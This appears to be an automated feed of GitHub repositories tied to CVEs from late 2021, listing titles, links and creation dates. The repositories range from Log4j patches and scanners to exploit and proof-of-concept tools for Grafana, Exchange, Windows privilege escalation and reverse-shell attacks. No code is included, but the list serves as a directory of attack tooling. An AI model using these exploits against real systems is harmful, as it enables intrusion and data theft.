**Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process** : [simonis/Log4jPatch](https://github.com/simonis/Log4jPatch) create time: 2021-12-10T10:10:19Z

**Plugin which fixes 0day exploit (CVE-2021-44228) with Log4j apache package** : [Szczurowsky/Log4j-0Day-Fix](https://github.com/Szczurowsky/Log4j-0Day-Fix) create time: 2021-12-10T09:43:49Z

**CVE-2021-44228 fix** : [DragonSurvivalEU/RCE](https://github.com/DragonSurvivalEU/RCE) create time: 2021-12-10T09:20:40Z

**Remote Code Injection In Log4j** : [y35uishere/Log4j2-CVE-2021-44228](https://github.com/y35uishere/Log4j2-CVE-2021-44228) create time: 2021-12-10T07:18:15Z

**一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.** : [boundaryx/cloudrasp-log4j2](https://github.com/boundaryx/cloudrasp-log4j2) create time: 2021-12-10T06:42:37Z

**Apache Log4j 2 a remote code execution vulnerability via the ldap JNDI parser.** : [dbgee/CVE-2021-44228](https://github.com/dbgee/CVE-2021-44228) create time: 2021-12-10T06:59:10Z

**Log4j-RCE (CVE-2021-44228)** : [HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept) create time: 2021-12-10T06:15:38Z

**Remote Code Injection In Log4j** : [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228) create time: 2021-12-10T05:23:44Z

**Patch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2** : [Glease/Healer](https://github.com/Glease/Healer) create time: 2021-12-09T21:49:33Z

**A spigot plugin to fix CVE-2021-44228 Log4j remote code execution vulnerability, to protect Minecraft clients.** : [UltraVanilla/LogJackFix](https://github.com/UltraVanilla/LogJackFix) create time: 2021-12-10T04:20:03Z

**This tool patches the CVE-2017-5645 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN after downloading or updating versions of minecraft as its not a perminent patch** : [jacobtread/L4J-Vuln-Patch](https://github.com/jacobtread/L4J-Vuln-Patch) create time: 2021-12-10T00:14:06Z

**Exploit iDRAC 7 & 8 firmware < 2.52.52.52** : [mgargiullo/cve-2018-1207](https://github.com/mgargiullo/cve-2018-1207) create time: 2021-12-09T23:47:22Z

**no description** : [M-ensimag/CVE-2019-18276](https://github.com/M-ensimag/CVE-2019-18276) create time: 2021-12-09T20:22:01Z

**update to Daniele Scanu's SQL Injection Exploit - CVE-2019-9053** : [Marbocatcat/46635.py](https://github.com/Marbocatcat/46635.py) create time: 2021-12-09T17:39:15Z

**PoC of FortiWAN auth bypass (https://www.fortiguard.com/psirt/FG-IR-21-048)** : [SleepyCofe/CVE-2021-26102](https://github.com/SleepyCofe/CVE-2021-26102) create time: 2021-12-09T12:55:30Z

**CVE-2021-43798Exp多线程批量验证脚本** : [fanygit/Grafana-CVE-2021-43798Exp](https://github.com/fanygit/Grafana-CVE-2021-43798Exp) create time: 2021-12-09T11:25:47Z

**CVE-2021-27928-POC** : [shamo0/CVE-2021-27928-POC](https://github.com/shamo0/CVE-2021-27928-POC) create time: 2021-12-09T11:18:26Z

**no description** : [julesbozouklian/CVE-2021-43798](https://github.com/julesbozouklian/CVE-2021-43798) create time: 2021-12-09T10:17:57Z

**Grafana-POC任意文件读取漏洞(CVE-2021-43798)** : [culprits/Grafana_POC-CVE-2021-43798](https://github.com/culprits/Grafana_POC-CVE-2021-43798) create time: 2021-12-09T09:53:25Z

**Simple program for exploit grafana** : [z3n70/CVE-2021-43798](https://github.com/z3n70/CVE-2021-43798) create time: 2021-12-09T09:48:40Z

**CVE-2021-38759 public Exploit** : [joanbono/CVE-2021-38759](https://github.com/joanbono/CVE-2021-38759) create time: 2021-12-08T21:17:31Z

**Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077** : [horizon3ai/CVE-2021-44077](https://github.com/horizon3ai/CVE-2021-44077) create time: 2021-12-08T20:24:38Z

**no description** : [RamPanic/CVE-2019-19609-EXPLOIT](https://github.com/RamPanic/CVE-2019-19609-EXPLOIT) create time: 2021-12-08T15:38:20Z

**no description** : [s1gh/CVE-2021-43798](https://github.com/s1gh/CVE-2021-43798) create time: 2021-12-08T14:14:38Z

**Grafanav8.*版本任意文件读取漏洞poc&exp,该漏洞目前为0day漏洞,未授权的攻击者利用该漏洞,能够获取服务器敏感文件。** : [asaotomo/Grafana-V8.0-exp-CVE-2021-43798-arbitrary-file-reading-vulnerability](https://github.com/asaotomo/Grafana-V8.0-exp-CVE-2021-43798-arbitrary-file-reading-vulnerability) create time: 2021-12-07T14:06:26Z

**CVE-2021-43798-Grafana任意文件读取漏洞** : [lfz97/CVE-2021-43798-Grafana-File-Read](https://github.com/lfz97/CVE-2021-43798-Grafana-File-Read) create time: 2021-12-08T07:08:37Z

**Grafana File-Read Vuln** : [JiuBanSec/Grafana-CVE-2021-43798](https://github.com/JiuBanSec/Grafana-CVE-2021-43798) create time: 2021-12-08T07:06:58Z

**Grafana Unauthorized arbitrary file reading vulnerability** : [jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798) create time: 2021-12-07T09:02:16Z

**no description** : [j-jasson/CVE-2021-43798-grafana_fileread](https://github.com/j-jasson/CVE-2021-43798-grafana_fileread) create time: 2021-12-08T03:43:31Z

**Python Exploit Code** : [scopion/CVE-2021-43799](https://github.com/scopion/CVE-2021-43799) create time: 2021-12-08T00:47:00Z

**grafana-fileread-0day-poc** : [Yang-Zhongshan/grafana-fileread-0day-poc-CVE-2021-43798](https://github.com/Yang-Zhongshan/grafana-fileread-0day-poc-CVE-2021-43798) create time: 2021-12-07T13:48:01Z

**Python Exploit Code** : [darkerego/CVE-2021-43798](https://github.com/darkerego/CVE-2021-43798) create time: 2021-12-08T00:36:04Z

**利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。** : [kenuosec/grafanaExp](https://github.com/kenuosec/grafanaExp) create time: 2021-12-07T16:39:09Z

**CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)** : [taythebot/CVE-2021-43798](https://github.com/taythebot/CVE-2021-43798) create time: 2021-12-06T20:10:23Z

**no description** : [phrantom/cve-2021-38314](https://github.com/phrantom/cve-2021-38314) create time: 2021-12-07T15:39:04Z

**利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。** : [A-D-Team/grafanaExp](https://github.com/A-D-Team/grafanaExp) create time: 2021-12-07T15:11:34Z

**Grafana Arbitrary File Reading Vulnerability** : [zer0yu/CVE-2021-43798](https://github.com/zer0yu/CVE-2021-43798) create time: 2021-12-07T08:59:11Z

**CVE-2021-43798:Grafana 任意文件读取漏洞** : [Mr-xn/CVE-2021-43798](https://github.com/Mr-xn/CVE-2021-43798) create time: 2021-12-07T12:47:58Z

**no description** : [tangxiaofeng7/CVE-2021-43798-Grafana-File-Read](https://github.com/tangxiaofeng7/CVE-2021-43798-Grafana-File-Read) create time: 2021-12-07T08:28:56Z

**druid未授权访问批量扫描poc** : [MzzdToT/CVE-2021-34045](https://github.com/MzzdToT/CVE-2021-34045) create time: 2021-12-07T06:58:15Z

**reverse shell execution exploit of CVE 22204** : [Asaad27/CVE-2021-22204-RSE](https://github.com/Asaad27/CVE-2021-22204-RSE) create time: 2021-12-06T21:53:55Z

**no description** : [thpless/CVE-2018-6574](https://github.com/thpless/CVE-2018-6574) create time: 2021-12-06T20:14:43Z

**CVE-2021-43471** : [cxaqhq/CVE-2021-43471](https://github.com/cxaqhq/CVE-2021-43471) create time: 2021-11-03T10:27:16Z

**CVE-2021-43469** : [badboycxcc/CVE-2021-43469](https://github.com/badboycxcc/CVE-2021-43469) create time: 2021-11-03T03:54:14Z

**no description** : [zer0yu/CVE-2021-41277](https://github.com/zer0yu/CVE-2021-41277) create time: 2021-12-06T08:52:32Z

**A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157.** : [0xInfection/PewSWITCH](https://github.com/0xInfection/PewSWITCH) create time: 2021-11-28T13:12:38Z

**CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)** : [fumamatar/NimNightmare](https://github.com/fumamatar/NimNightmare) create time: 2021-12-05T14:49:32Z

**N-DAY VULNERABILITY RESEARCH (FROM PATCH TO EXPLOIT ANALYSIS OF CVE-2021-41081)** : [sudaiv/CVE-2021-41081](https://github.com/sudaiv/CVE-2021-41081) create time: 2021-12-05T05:22:08Z

**Microsoft Exchange ProxyLogon PoC (CVE-2021-26855)** : [thau0x01/poc_proxylogon](https://github.com/thau0x01/poc_proxylogon) create time: 2021-12-04T22:38:30Z

**Unauthenticated Sensitive Information Disclosure (CVE-2021–38314).** : [oxctdev/CVE-2021-38314](https://github.com/oxctdev/CVE-2021-38314) create time: 2021-12-04T17:08:05Z

**CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver** : [0xdevil/CVE-2021-42008](https://github.com/0xdevil/CVE-2021-42008) create time: 2021-12-03T14:08:26Z

**Python tool for exploiting CVE-2021-35616** : [Ofirhamam/OracleOTM](https://github.com/Ofirhamam/OracleOTM) create time: 2021-12-03T13:22:19Z

**D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the DHE key exchange.** : [Balasys/dheater](https://github.com/Balasys/dheater) create time: 2021-08-31T09:51:12Z

**Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver** : [numanturle/CVE-2021-42008](https://github.com/numanturle/CVE-2021-42008) create time: 2021-12-03T13:18:32Z

**a python3 version of the exploit written for CVE-2014-6287. Useful for completing the "Steel Mountain" room on TryHackMe.com without the use of metasploit.** : [Mr-Intern/thm_steelmountain_CVE-2014-6287](https://github.com/Mr-Intern/thm_steelmountain_CVE-2014-6287) create time: 2021-12-03T12:13:35Z

**no description** : [sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP) create time: 2021-12-03T12:30:07Z

**no description** : [Nivaskumark/CVE-2019-9367_system_bt](https://github.com/Nivaskumark/CVE-2019-9367_system_bt) create time: 2021-12-03T11:34:45Z

**no description** : [Nivaskumark/CVE-2019-9367_system_bt__](https://github.com/Nivaskumark/CVE-2019-9367_system_bt__) create time: 2021-12-03T11:25:45Z

**no description** : [MaximeSchlegel/CVE-2021-32724-Target](https://github.com/MaximeSchlegel/CVE-2021-32724-Target) create time: 2021-12-03T12:09:46Z

**CVE 2021-37832 poc** : [AK-blank/CVE-2021-37832](https://github.com/AK-blank/CVE-2021-37832) create time: 2021-12-03T07:35:02Z

**A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.** : [Osyanina/westone-CVE-2021-21980-scanner](https://github.com/Osyanina/westone-CVE-2021-21980-scanner) create time: 2021-12-03T02:30:14Z

**Plex media server local privilige escalation poc - CVE-2021-42835** : [netanelc305/PlEXcalaison](https://github.com/netanelc305/PlEXcalaison) create time: 2021-12-02T20:18:08Z

**no description** : [infobyte/Exploit-CVE-2021-21086](https://github.com/infobyte/Exploit-CVE-2021-21086) create time: 2021-12-02T18:30:53Z

**A write up on the Steel Mountain box from TryHackMe.com and exploit for CVE-2014-6287** : [SlizBinksman/THM-Steel_Mountain-CVE-2014-6287](https://github.com/SlizBinksman/THM-Steel_Mountain-CVE-2014-6287) create time: 2021-12-02T15:15:09Z

**no description** : [dearpan/cve-2018-9995](https://github.com/dearpan/cve-2018-9995) create time: 2021-12-02T07:52:28Z

**CVE-2021-42325 POC** : [AK-blank/CVE-2021-42325-](https://github.com/AK-blank/CVE-2021-42325-) create time: 2021-12-02T06:56:02Z

**Gex is an iOS 14.7 jailbreak using CVE-2021-30807 IOMFB exploit** : [30440r/gex](https://github.com/30440r/gex) create time: 2021-11-30T14:56:04Z

**no description** : [listenquiet/cve-2017-2824-reverse-shell](https://github.com/listenquiet/cve-2017-2824-reverse-shell) create time: 2021-11-30T09:42:25Z

**CVE-2021-43778 poc** : [AK-blank/CVE-2021-43778](https://github.com/AK-blank/CVE-2021-43778) create time: 2021-11-30T08:19:24Z

**https://github.com/zhongjiao01/cve-2021-21** : [zhongjiao01/test](https://github.com/zhongjiao01/test) create time: 2021-11-30T06:42:29Z

**Sigma-Rule-for-CVE-2021-40438-Attack-Attemp** : [pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt) create time: 2021-11-30T06:07:49Z

**Script in python detecting malious office document** : [YxZi5/Detection-CVE_2021_40444](https://github.com/YxZi5/Detection-CVE_2021_40444) create time: 2021-11-29T16:32:23Z

**Shell code for CVE-2020-7247-POC** : [SimonSchoeni/SimonSchoeniCVE20207247.github.io](https://github.com/SimonSchoeni/SimonSchoeniCVE20207247.github.io) create time: 2021-11-29T14:04:07Z

**攻击WIFI的常用方式** : [fengchenzxc/CVE-2020-28148](https://github.com/fengchenzxc/CVE-2020-28148) create time: 2021-11-29T08:38:27Z

**no description** : [Nivaskumark/CVE-2020-0074-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0074-frameworks_base) create time: 2021-11-29T07:13:33Z

**Gerapy clone background remote command execution** : [ohnonoyesyes/CVE-2021-32849](https://github.com/ohnonoyesyes/CVE-2021-32849) create time: 2021-11-29T06:39:27Z

**no description** : [Nivaskumark/CVE-2020-0074-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0074-frameworks_base) create time: 2021-11-29T06:18:01Z

**no description** : [Nivaskumark/CVE-2020-0097-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0097-frameworks_base) create time: 2021-11-29T04:00:19Z

**no description** : [Nivaskumark/CVE-2020-0097-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0097-frameworks_base) create time: 2021-11-29T03:12:16Z

**no description** : [Nivaskumark/CVE-2020-0114-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0114-frameworks_base) create time: 2021-11-29T02:27:53Z

**no description** : [Nivaskumark/CVE-2020-0114-frameworks_base_before](https://github.com/Nivaskumark/CVE-2020-0114-frameworks_base_before) create time: 2021-11-29T01:37:12Z

**Exploit for CVE-2021-30807** : [jsherman212/iomfb-exploit](https://github.com/jsherman212/iomfb-exploit) create time: 2021-10-09T20:11:42Z

**CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day** : [exploitblizzard/WindowsMDM-LPE-0Day](https://github.com/exploitblizzard/WindowsMDM-LPE-0Day) create time: 2021-11-28T09:48:36Z

**no description** : [sg552/demo_cve_2020-8184](https://github.com/sg552/demo_cve_2020-8184) create time: 2021-11-28T09:13:23Z

**TP-Link TL-WR840N EU v5 Remote Code Execution** : [ohnonoyesyes/CVE-2021-41653](https://github.com/ohnonoyesyes/CVE-2021-41653) create time: 2021-11-28T01:15:36Z

**ARM64 PoC for CVE-2021-21224** : [ohnonoyesyes/CVE-2021-21224](https://github.com/ohnonoyesyes/CVE-2021-21224) create time: 2021-11-28T01:10:54Z

**Strapi Framework, 3.0.0-beta.17.4** : [xda3m00n/CVE-2019](https://github.com/xda3m00n/CVE-2019) create time: 2021-11-27T13:58:18Z

**Windows MDM LPE** : [ohnonoyesyes/CVE-2021-24084](https://github.com/ohnonoyesyes/CVE-2021-24084) create time: 2021-11-27T00:37:07Z

**no description** : [r1l4-i3pur1l4/CVE-2021-21042](https://github.com/r1l4-i3pur1l4/CVE-2021-21042) create time: 2021-11-26T21:31:18Z

**Proof of concept for CVE-2020-7247 for educational purposes.** : [SimonSchoeni/CVE-2020-7247-POC](https://github.com/SimonSchoeni/CVE-2020-7247-POC) create time: 2021-11-26T17:28:56Z

**no description** : [Nivaskumark/CVE-2020-0114-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0114-frameworks_base) create time: 2021-11-26T12:58:16Z

**CVE-2021-40865** : [hktalent/CVE-2021-40865](https://github.com/hktalent/CVE-2021-40865) create time: 2021-11-26T10:09:40Z

**no description** : [Nivaskumark/CVE-2020-0097-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0097-frameworks_base) create time: 2021-11-26T07:41:02Z

**no description** : [Nivaskumark/CVE-2020-0114-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0114-frameworks_base) create time: 2021-11-26T07:19:26Z

**no description** : [Nivaskumark/CVE-2020-0114-frameworks](https://github.com/Nivaskumark/CVE-2020-0114-frameworks) create time: 2021-11-26T07:07:13Z

**CVE-2021-1347** : [givemefivw/CVE-2021-1347](https://github.com/givemefivw/CVE-2021-1347) create time: 2021-11-26T07:18:50Z

**CVE-2021-41773 Test Page & Exploit Code** : [jhye0n/CVE-2021-41773](https://github.com/jhye0n/CVE-2021-41773) create time: 2021-11-26T04:54:16Z

**Detect with python and tracking IP** : [vphnguyen/ANM_CVE-2018-7600](https://github.com/vphnguyen/ANM_CVE-2018-7600) create time: 2021-11-26T03:25:50Z

**CVE-2019-6249 Hucart cms 复现环境** : [AlphabugX/CVE-2019-6249_Hucart-cms](https://github.com/AlphabugX/CVE-2019-6249_Hucart-cms) create time: 2019-02-21T08:03:43Z

**no description** : [Nivaskumark/CVE-2020-0133-packages_apps_Settings](https://github.com/Nivaskumark/CVE-2020-0133-packages_apps_Settings) create time: 2021-11-26T03:17:14Z

**no description** : [Nivaskumark/CVE-2020-0133-packages_apps_Settings_final](https://github.com/Nivaskumark/CVE-2020-0133-packages_apps_Settings_final) create time: 2021-11-26T03:08:47Z

**no description** : [Nivaskumark/CVE-2020-0133-packages_apps_Settings](https://github.com/Nivaskumark/CVE-2020-0133-packages_apps_Settings) create time: 2021-11-26T01:29:58Z

**Local PoC exploit for CVE-2021-43267 (Linux TIPC)** : [ohnonoyesyes/CVE-2021-43267](https://github.com/ohnonoyesyes/CVE-2021-43267) create time: 2021-11-26T01:51:57Z

**no description** : [Nivaskumark/CVE-2020-0074-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0074-frameworks_base) create time: 2021-11-25T16:17:23Z

**no description** : [Nivaskumark/CVE-2020-0074-frameworks_base_old](https://github.com/Nivaskumark/CVE-2020-0074-frameworks_base_old) create time: 2021-11-25T16:02:52Z

**no description** : [Nivaskumark/CVE-2020-0097-frameworks_base_after](https://github.com/Nivaskumark/CVE-2020-0097-frameworks_base_after) create time: 2021-11-25T15:47:33Z

**no description** : [Nivaskumark/CVE-2020-0097-frameworks_base_before](https://github.com/Nivaskumark/CVE-2020-0097-frameworks_base_before) create time: 2021-11-25T15:29:28Z

**no description** : [Nivaskumark/CVE-2020-0114-frameworks_base](https://github.com/Nivaskumark/CVE-2020-0114-frameworks_base) create time: 2021-11-25T15:13:33Z

**no description** : [Nivaskumark/_beforeCVE-2020-0114-frameworks_base](https://github.com/Nivaskumark/_beforeCVE-2020-0114-frameworks_base) create time: 2021-11-25T15:04:14Z

**no description** : [Nivaskumark/CVE-2020-0133-packages_apps_Settings](https://github.com/Nivaskumark/CVE-2020-0133-packages_apps_Settings) create time: 2021-11-25T14:49:20Z

**no description** : [Nivaskumark/CVE-2020-0133-packages_apps_Settings_nopatch](https://github.com/Nivaskumark/CVE-2020-0133-packages_apps_Settings_nopatch) create time: 2021-11-25T14:38:58Z

**A CVE-2021-22205 Gitlab RCE POC written in Golang** : [pizza-power/Golang-CVE-2021-22205-POC](https://github.com/pizza-power/Golang-CVE-2021-22205-POC) create time: 2021-11-25T12:47:27Z

**A GitHub Action to find Unicode control characters using the Red Hat diagnostic tool https://access.redhat.com/security/vulnerabilities/RHSB-2021-007 to detect RHSB-2021-007 Trojan source attacks (CVE-2021-42574,CVE-2021-42694)** : [pierDipi/unicode-control-characters-action](https://github.com/pierDipi/unicode-control-characters-action) create time: 2021-11-25T08:02:31Z

**CVE-2021-41773 on Docker** : [ahmad4fifz/CVE-2021-42013](https://github.com/ahmad4fifz/CVE-2021-42013) create time: 2021-11-25T09:07:00Z

**no description** : [lisinan988/CVE-2017-11882-exp](https://github.com/lisinan988/CVE-2017-11882-exp) create time: 2021-11-25T05:03:46Z

**no description** : [lisinan988/CVE-2018-8174-exp](https://github.com/lisinan988/CVE-2018-8174-exp) create time: 2021-11-25T05:06:25Z

**no description** : [lisinan988/CVE-2019-0708-scan](https://github.com/lisinan988/CVE-2019-0708-scan) create time: 2021-11-25T04:53:22Z

**no description** : [lisinan988/CVE-2020-0796-exp](https://github.com/lisinan988/CVE-2020-0796-exp) create time: 2021-11-25T04:59:48Z

**no description** : [lisinan988/CVE-2021-40444-exp](https://github.com/lisinan988/CVE-2021-40444-exp) create time: 2021-11-25T05:13:05Z

**no description** : [lisinan988/CVE-2021-24086-exp](https://github.com/lisinan988/CVE-2021-24086-exp) create time: 2021-11-25T04:56:33Z

**no description** : [Hyperkopite/CVE-2021-44217](https://github.com/Hyperkopite/CVE-2021-44217) create time: 2021-11-25T01:24:58Z

**Metabase GeoJSON map local file inclusion** : [TheLastVvV/CVE-2021-41277](https://github.com/TheLastVvV/CVE-2021-41277) create time: 2021-11-24T05:56:46Z

**Python 3 script to identify CVE-2021-26084 via network requests.** : [quesodipesto/conflucheck](https://github.com/quesodipesto/conflucheck) create time: 2021-11-23T19:45:31Z

**no description** : [Vulnmachines/Metabase_CVE-2021-41277](https://github.com/Vulnmachines/Metabase_CVE-2021-41277) create time: 2021-11-23T18:01:23Z

**POC to test the BootROM vulnerability found in LPC55S69 and K82 Series** : [Xen1thLabs-AE/CVE-2021-40154](https://github.com/Xen1thLabs-AE/CVE-2021-40154) create time: 2021-11-23T15:44:42Z

**Icewarp Mail Server 12.3.0.1 insecure_permissions** : [pinpinsec/CVE-2020-14066](https://github.com/pinpinsec/CVE-2020-14066) create time: 2021-11-23T14:02:54Z

**Icewarp Mail Server 12.3.0.1 unlimited_file_upload** : [pinpinsec/CVE-2020-14065](https://github.com/pinpinsec/CVE-2020-14065) create time: 2021-11-23T13:53:45Z

**Icewarp Mail Server 12.3.0.1 incorrect_access_control** : [pinpinsec/CVE-2020-14064](https://github.com/pinpinsec/CVE-2020-14064) create time: 2021-11-23T13:42:56Z

**no description** : [hlong12042/CVE_2019_11043](https://github.com/hlong12042/CVE_2019_11043) create time: 2021-11-23T09:14:21Z

**plugin made for LeakiX** : [kaizensecurity/CVE-2021-41277](https://github.com/kaizensecurity/CVE-2021-41277) create time: 2021-11-23T06:24:16Z

**Microsoft Exchange Server Poc** : [DarkSprings/CVE-2021-42321](https://github.com/DarkSprings/CVE-2021-42321) create time: 2021-11-23T02:26:26Z

**PoC for CVE-2021-43557** : [xvnpw/k8s-CVE-2021-43557-poc](https://github.com/xvnpw/k8s-CVE-2021-43557-poc) create time: 2021-11-22T20:23:05Z

**CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability** : [Vulnmachines/CVE-2021-22053](https://github.com/Vulnmachines/CVE-2021-22053) create time: 2021-11-22T18:26:16Z

**simple program for exploit metabase** : [z3n70/CVE-2021-41277](https://github.com/z3n70/CVE-2021-41277) create time: 2021-11-22T18:06:11Z

**A write up on the THM room Vulnerability Capstone & Exploit script for CVE-2018-16763.** : [SlizBinksman/THM-Vulnerability_Capstone-CVE-2018-16763](https://github.com/SlizBinksman/THM-Vulnerability_Capstone-CVE-2018-16763) create time: 2021-11-22T14:53:42Z

**A demo of exploiting CVE-2021-40531, a vulnerability in Sketch.** : [jonpalmisc/CVE-2021-40531](https://github.com/jonpalmisc/CVE-2021-40531) create time: 2021-11-19T17:38:34Z

**no description** : [Alexcot25051999/CVE-2021-40444](https://github.com/Alexcot25051999/CVE-2021-40444) create time: 2021-11-22T13:29:20Z

**MetaBase 任意文件读取漏洞 fofa批量poc** : [kap1ush0n/CVE-2021-41277](https://github.com/kap1ush0n/CVE-2021-41277) create time: 2021-11-22T12:49:42Z

**MetaBase 任意文件读取漏洞 fofa批量poc** : [Hum0r/CVE-2021-41277](https://github.com/Hum0r/CVE-2021-41277) create time: 2021-11-22T12:30:36Z

**no description** : [je6k/CVE-2021-34473-Exchange-ProxyShell](https://github.com/je6k/CVE-2021-34473-Exchange-ProxyShell) create time: 2021-11-22T07:47:09Z

**Metabase 任意文件读取** : [Henry4E36/Metabase-cve-2021-41277](https://github.com/Henry4E36/Metabase-cve-2021-41277) create time: 2021-11-22T02:51:49Z

**no description** : [tahtaciburak/CVE-2021-41277](https://github.com/tahtaciburak/CVE-2021-41277) create time: 2021-11-21T11:38:08Z

**Metabase信息泄露批量扫描脚本** : [Seals6/CVE-2021-41277](https://github.com/Seals6/CVE-2021-41277) create time: 2021-11-21T11:04:44Z

**I try write it with rust-lang** : [Ki11i0n4ir3/CVE-2021-21315](https://github.com/Ki11i0n4ir3/CVE-2021-21315) create time: 2021-11-10T06:40:17Z

**Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053** : [SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053) create time: 2021-11-21T08:47:56Z

**no description** : [ypl6/cve-demo-2020-8287](https://github.com/ypl6/cve-demo-2020-8287) create time: 2021-11-21T05:16:41Z

**Crawl MS numbers and CVEs from 2015 -2016** : [Arsham1024/CVE_Crawler](https://github.com/Arsham1024/CVE_Crawler) create time: 2021-11-21T04:15:26Z

**CVE-2021-36749 Docker 漏洞复现** : [zwlsix/apache_druid_CVE-2021-36749](https://github.com/zwlsix/apache_druid_CVE-2021-36749) create time: 2021-11-21T03:23:00Z

**Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy)…** : [FoxxD3Vza/adamyordan](https://github.com/FoxxD3Vza/adamyordan) create time: 2021-11-20T03:06:01Z

**Apache ShenYu 管理员认证绕过** : [Wing-song/CVE-2021-37580](https://github.com/Wing-song/CVE-2021-37580) create time: 2021-11-19T13:59:26Z

**CVE-2021-37580** : [Liang2580/CVE-2021-37580](https://github.com/Liang2580/CVE-2021-37580) create time: 2021-11-19T09:00:37Z

**no description** : [ZororoZ/CVE-2021-37580](https://github.com/ZororoZ/CVE-2021-37580) create time: 2021-11-19T08:21:44Z

**A vulnerability scanner that detects CVE-2021-37580 vulnerabilities.** : [Osyanina/westone-CVE-2021-37580-scanner](https://github.com/Osyanina/westone-CVE-2021-37580-scanner) create time: 2021-11-19T06:49:35Z

**CVE-2021-43617 bypass CRF** : [kombat1/CVE-2021-43617](https://github.com/kombat1/CVE-2021-43617) create time: 2021-11-19T05:39:25Z

**Site Editor WordPress Plugin <= 1.1.1 Local File Inclusion Script** : [jessisec/CVE-2018-7422](https://github.com/jessisec/CVE-2018-7422) create time: 2021-11-18T21:52:11Z

**CVE-2013-2171** : [Gabriel-Lima232/FreeBSD-9.0-9.1---Privilege-Escalation](https://github.com/Gabriel-Lima232/FreeBSD-9.0-9.1---Privilege-Escalation) create time: 2021-11-18T12:25:10Z

**no description** : [KAB8345/CVE-2021-26411](https://github.com/KAB8345/CVE-2021-26411) create time: 2021-11-18T08:26:37Z

**PoC for CVE-2017-17562 written in bash** : [freitzzz/bash-CVE-2017-17562](https://github.com/freitzzz/bash-CVE-2017-17562) create time: 2021-11-17T18:21:54Z

**CVE-2021-37580的poc** : [fengwenhua/CVE-2021-37580](https://github.com/fengwenhua/CVE-2021-37580) create time: 2021-11-17T13:26:46Z

**Demonstration of CVE-2018-19571: GitLab SSRF CVE** : [CS4239-U6/gitlab-ssrf](https://github.com/CS4239-U6/gitlab-ssrf) create time: 2021-11-16T13:45:06Z

**An example of CVE-2020-7740** : [CS4239-U6/node-pdf-generator-ssrf](https://github.com/CS4239-U6/node-pdf-generator-ssrf) create time: 2021-11-11T10:53:10Z

**no description** : [rabbitsafe/CVE-2021-37580](https://github.com/rabbitsafe/CVE-2021-37580) create time: 2021-11-17T08:33:25Z

**PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)** : [nth347/CVE-2020-28032_PoC](https://github.com/nth347/CVE-2020-28032_PoC) create time: 2021-11-17T07:09:47Z

**cve-2020-35314,一个带phpcode的zip文件** : [ybdegit2020/wonderplugin](https://github.com/ybdegit2020/wonderplugin) create time: 2021-11-17T02:39:06Z

**no description** : [tomquinn8/CVE-2011-5331](https://github.com/tomquinn8/CVE-2011-5331) create time: 2021-11-16T16:49:04Z

**CVE-2020-0787的简单回显** : [yanghaoi/CVE-2020-0787](https://github.com/yanghaoi/CVE-2020-0787) create time: 2021-11-16T11:04:42Z

**no description** : [nth347/CVE-2018-20148_exploit](https://github.com/nth347/CVE-2018-20148_exploit) create time: 2021-11-16T07:19:47Z

**A write up on the TryHackMe room Source & a python script to exploit the vulnerability** : [SlizBinksman/THM-Source-CVE-2019-15231](https://github.com/SlizBinksman/THM-Source-CVE-2019-15231) create time: 2021-11-15T15:23:05Z

**poc for CVE-2020-2555** : [Qynklee/POC_CVE-2020-2555](https://github.com/Qynklee/POC_CVE-2020-2555) create time: 2021-11-15T09:06:42Z

**POC for CVE-2020-2883** : [Qynklee/POC_CVE-2020-2883](https://github.com/Qynklee/POC_CVE-2020-2883) create time: 2021-11-15T08:56:44Z

**Repo demonstrating CVE-2021-43616 / https://github.com/npm/cli/issues/2701** : [icatalina/CVE-2021-43616](https://github.com/icatalina/CVE-2021-43616) create time: 2021-11-15T01:06:10Z

